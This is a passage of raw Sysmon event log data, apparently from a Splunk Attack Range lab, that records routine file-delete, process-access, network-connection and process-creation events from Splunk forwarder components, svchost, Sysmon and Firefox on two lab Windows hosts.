07:58:25.587{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1AEB11D4E9A50B643D723598922C81B,SHA256=997A7EC367F12C167D9868113D6C200811FCD05A1043B3474503E7E52C5DB2F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.587{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EEBE2C06EF2D8BB7AF14B4C8A2A6030,SHA256=5BC696FEBA1286FF1E332051C8DACC7B39DE15B6DF315B6937D9FE77987D540D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:25.587{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB7F4F76D4AB145A04E1B3F3820BB4AC,SHA256=590C2E7C6BE82C599431218E14D40EC4C5B141D3D4C1E538EB9918F6BA4DF67B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:17.787{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51111-false10.0.1.12-8000- 23542300x80000000000000001051651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:25.150{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E81A999385FE3CE7DF870A7F6905B7D,SHA256=A58E41F6E4E6AD556F2E0A9BA10E5DEB593FD91A10227B0CD422DF1198C275A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F622-60EB-A179-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F622-60EB-A179-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F622-60EB-A179-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.963{0C1E0330-F622-60EB-A179-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.728{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C25FA71A45D82202914ECDC4A1B16DC6,SHA256=F9A50FF3F27C85EE0FC9375EEC1887F386C1AAFFFAA96E79355E44A6CBF79520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.587{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1AEB11D4E9A50B643D723598922C81B,SHA256=997A7EC367F12C167D9868113D6C200811FCD05A1043B3474503E7E52C5DB2F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C59DE65A8DF13EFF412D506D7565CC24,SHA256=60E9E6892734D850B991551D00EA5764869182456B55F339B92244B6EA0A1CEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F662DBB416DE8E2C915EA76F94D33D8F,SHA256=FE2F3562B8DDF37EF94C071A980FC2FB289992FE0D8C2B7BC094D67F19947F6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE8622650583C24DC19FAD06BCF02FD1,SHA256=86C2A12C17DDB6935FB787C604732200380AB54AA14D9991B726A392BCA6D9EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=63654E91D6A4512D994277A57CAF46CF,SHA256=A2D02482B632F4BB711036BECE51F99E0DEBE6257160E4D29B09188DF3A65426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=64518819625BF192C6891091535154A8,SHA256=1C1386C7BB946209F585658BA1D1951A2F8C09174619801F199AB8F2B634D562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=18DBBA10F0C61F1F10475DB085CEA8E9,SHA256=997B0607F74F2BBB610CC485BD71B42F81F06123916A8FD9C802F4C6EB9047B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=94C0C1A2E93BF854DB197CB78A7C4BCE,SHA256=FD95329C811CFA6DAB47ED60412B5A9E8DDFDC431E3663976522255B4AB83653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=403138F5D064703128BF44559896A86C,SHA256=9F92CA482B049004E855FB11CB8E11518FEF862A2E3DB2A5E1EFC14CA9651DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A32A7BFCB74C34E76FC2277DE8220D5B,SHA256=69C5714FABE056C30FB1C4FFE6B9B47ABE24BADC1D6C56951C85CA9C61E34DA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EE2F1F022ED03624E4325BD0772D85AD,SHA256=05A2749AEA80A901EE9B929E3162922744FFE78AFDC48197A859A7EDCC161436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=655EF5F1A7D27EE88DC3AC1209ED1D3C,SHA256=698A8DE604AA2E2C07D8FD85C4D9B645A173CE596B3533FA8FDB931A7C9505EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.165{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD58B0CB9252FEAF64B5959809B0D960,SHA256=3E39898429CEA422B1F71A0CC498E1614B2601BC7CDD9E014A71CBC913770FB3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F622-60EB-A079-00000000D001}2164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 